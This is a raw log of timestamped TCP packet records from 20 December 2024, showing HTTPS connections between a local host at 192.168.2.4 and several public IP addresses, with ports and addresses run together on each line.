                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.319413900 CET49925443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.323328018 CET44349926141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.338881969 CET49918443192.168.2.4199.232.168.157
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.338896990 CET44349918199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.338941097 CET49926443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.338958025 CET44349926141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.373560905 CET44349918199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.373625994 CET49918443192.168.2.4199.232.168.157
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.373641968 CET44349918199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.378628016 CET44349918199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.378700972 CET49918443192.168.2.4199.232.168.157
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.378726959 CET44349918199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.378907919 CET44349918199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.378968000 CET49918443192.168.2.4199.232.168.157
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.379214048 CET49918443192.168.2.4199.232.168.157
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.379241943 CET44349918199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.382110119 CET49926443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.435657978 CET44349928141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.436095953 CET49928443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.436115980 CET44349928141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.439754009 CET44349928141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.439784050 CET44349927141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.439826012 CET49928443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.440361977 CET49927443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.440386057 CET44349927141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.441078901 CET49928443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.441265106 CET44349928141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.441279888 CET49928443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.441577911 CET44349927141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.442131996 CET49927443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.442320108 CET44349927141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.442394018 CET49927443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.444252014 CET44349929104.26.8.127192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.444777966 CET49929443192.168.2.4104.26.8.127
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.444802046 CET44349929104.26.8.127192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.448410988 CET44349929104.26.8.127192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.448489904 CET49929443192.168.2.4104.26.8.127
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.449110985 CET49929443192.168.2.4104.26.8.127
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.449279070 CET49929443192.168.2.4104.26.8.127
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.449295044 CET44349929104.26.8.127192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.483357906 CET44349927141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.483380079 CET44349928141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.491024017 CET49928443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.491039038 CET44349928141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.491086960 CET49929443192.168.2.4104.26.8.127
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.491101027 CET44349929104.26.8.127192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.498785973 CET44349922141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.498922110 CET44349922141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.499202967 CET49922443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.499231100 CET44349922141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.499285936 CET44349922141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.499339104 CET49922443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.508915901 CET49922443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.508950949 CET44349922141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.510348082 CET44349923141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.510637045 CET44349923141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.510701895 CET49923443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.515974045 CET49923443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.515984058 CET44349923141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.537806988 CET49928443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.537868023 CET49929443192.168.2.4104.26.8.127
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.563554049 CET44349930141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.563852072 CET49930443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.563915014 CET44349930141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.567296982 CET44349930141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.567409039 CET49930443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.567879915 CET49930443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.567967892 CET44349930141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.568056107 CET49930443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.611380100 CET44349930141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.615479946 CET49930443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.615511894 CET44349930141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.661276102 CET49930443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.679399967 CET44349931141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.679795980 CET49931443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.679848909 CET44349931141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.683379889 CET44349931141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.683470011 CET49931443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.683856010 CET44349924141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.683886051 CET49931443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.683924913 CET44349924141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.683968067 CET44349924141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.683986902 CET49924443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.684010983 CET44349924141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.684066057 CET44349924141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.684067011 CET44349931141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.684118032 CET44349924141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.684129000 CET49924443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.684144020 CET44349924141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.684200048 CET49924443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.684204102 CET49931443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.684221983 CET44349931141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.692907095 CET44349924141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.693938971 CET49924443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.693953037 CET44349924141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.698811054 CET44349932172.67.74.207192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.699193954 CET49932443192.168.2.4172.67.74.207
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.699208975 CET44349932172.67.74.207192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.700386047 CET44349924141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.700460911 CET49924443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.700778961 CET49924443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.700809002 CET44349924141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.700819016 CET44349932172.67.74.207192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.700911999 CET49932443192.168.2.4172.67.74.207
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.703541994 CET49932443192.168.2.4172.67.74.207
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.703633070 CET44349932172.67.74.207192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.703820944 CET49932443192.168.2.4172.67.74.207
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.703833103 CET44349932172.67.74.207192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.719265938 CET44349925141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.719592094 CET44349925141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.720434904 CET49925443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.720746040 CET49925443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.720779896 CET44349925141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.721287966 CET49935443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.721385956 CET44349935141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.724102020 CET49935443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.724421024 CET49935443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.724456072 CET44349935141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.730072021 CET44349926141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.730259895 CET44349926141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.731259108 CET49926443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.731530905 CET49926443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.731550932 CET44349926141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.736002922 CET49931443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.751698017 CET49932443192.168.2.4172.67.74.207
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.845081091 CET49936443192.168.2.4162.159.140.229
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.845160007 CET44349936162.159.140.229192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.845396996 CET49936443192.168.2.4162.159.140.229
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.845560074 CET49936443192.168.2.4162.159.140.229
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.845583916 CET44349936162.159.140.229192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.875446081 CET49937443192.168.2.4104.244.42.3
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.875502110 CET44349937104.244.42.3192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.875587940 CET49937443192.168.2.4104.244.42.3
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.875902891 CET49937443192.168.2.4104.244.42.3
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.875931025 CET44349937104.244.42.3192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.882042885 CET44349928141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.882306099 CET44349928141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.883716106 CET49928443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.883955956 CET49928443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.883971930 CET44349928141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.884335041 CET49938443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.884412050 CET44349938141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.884465933 CET44349927141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.884555101 CET49938443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.884659052 CET44349927141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.884732008 CET49927443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.884748936 CET44349927141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.884797096 CET44349927141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.884962082 CET44349927141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.885026932 CET49927443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.885348082 CET49938443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.885379076 CET44349938141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.886640072 CET49927443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.886668921 CET44349927141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.886996031 CET49939443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.887022972 CET44349939141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.887105942 CET49939443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.887463093 CET49939443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.887485981 CET44349939141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.948554993 CET44349929104.26.8.127192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.948792934 CET44349929104.26.8.127192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.949919939 CET49929443192.168.2.4104.26.8.127
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.950040102 CET49929443192.168.2.4104.26.8.127
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.950057030 CET44349929104.26.8.127192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.011758089 CET44349930141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.011995077 CET44349930141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.012938023 CET49930443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.013523102 CET49930443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.013561010 CET44349930141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.130152941 CET44349931141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.130268097 CET44349931141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.130472898 CET49931443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.204504013 CET49931443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.204566002 CET44349931141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.204936981 CET49940443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.204997063 CET44349940141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.205094099 CET49940443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.205739021 CET49940443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.205770969 CET44349940141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.227148056 CET49941443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.227175951 CET44349941141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.227268934 CET49941443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.227827072 CET49941443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.227838993 CET44349941141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.230885029 CET49942443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.230918884 CET44349942141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.231024027 CET49942443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.231489897 CET49942443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.231506109 CET44349942141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.261394024 CET44349932172.67.74.207192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.261590958 CET44349932172.67.74.207192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.261817932 CET49932443192.168.2.4172.67.74.207
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.262437105 CET49932443192.168.2.4172.67.74.207
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.262473106 CET44349932172.67.74.207192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.264122009 CET49943443192.168.2.4172.67.74.207
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.264166117 CET44349943172.67.74.207192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.264393091 CET49943443192.168.2.4172.67.74.207
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.264650106 CET49943443192.168.2.4172.67.74.207
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.264679909 CET44349943172.67.74.207192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.309242010 CET49944443192.168.2.4172.217.171.238
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.309307098 CET44349944172.217.171.238192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.309401035 CET49944443192.168.2.4172.217.171.238
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.309628010 CET49944443192.168.2.4172.217.171.238
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.309662104 CET44349944172.217.171.238192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.314374924 CET49945443192.168.2.464.233.167.156
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.314404011 CET4434994564.233.167.156192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.314776897 CET49945443192.168.2.464.233.167.156
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.315017939 CET49945443192.168.2.464.233.167.156
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.315043926 CET4434994564.233.167.156192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.343182087 CET49946443192.168.2.4172.217.19.194
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.343238115 CET44349946172.217.19.194192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.343338013 CET49946443192.168.2.4172.217.19.194
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.343565941 CET49946443192.168.2.4172.217.19.194
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.343596935 CET44349946172.217.19.194192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.399064064 CET49947443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.399096966 CET4434994762.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.399283886 CET49947443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.399573088 CET49947443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.399601936 CET4434994762.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.449558973 CET44349933141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.449851036 CET49933443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.449893951 CET44349933141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.450980902 CET44349933141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.451505899 CET49933443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.451668024 CET49933443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.451682091 CET44349933141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.451705933 CET44349933141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.474303007 CET44349934141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.475227118 CET49934443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.475272894 CET44349934141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.476423979 CET44349934141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.476862907 CET49934443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.477027893 CET49934443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.477041960 CET44349934141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.477082014 CET44349934141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.491180897 CET49933443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.522295952 CET49934443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.896119118 CET44349933141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.896270990 CET44349933141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.896332979 CET49933443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.896357059 CET44349933141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.896387100 CET44349933141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.896462917 CET49933443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.896498919 CET44349933141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.896637917 CET44349933141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.896697044 CET49933443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.898184061 CET49933443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.898220062 CET44349933141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.898763895 CET49948443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.898864985 CET44349948141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.898942947 CET49948443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.899501085 CET49948443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.899534941 CET44349948141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.919466972 CET44349934141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.919591904 CET44349934141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.919655085 CET49934443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.919684887 CET44349934141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.919938087 CET44349934141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.919992924 CET49934443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.920008898 CET44349934141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.920095921 CET44349934141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.920130014 CET49934443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.920147896 CET44349934141.193.213.11192.168.2.4
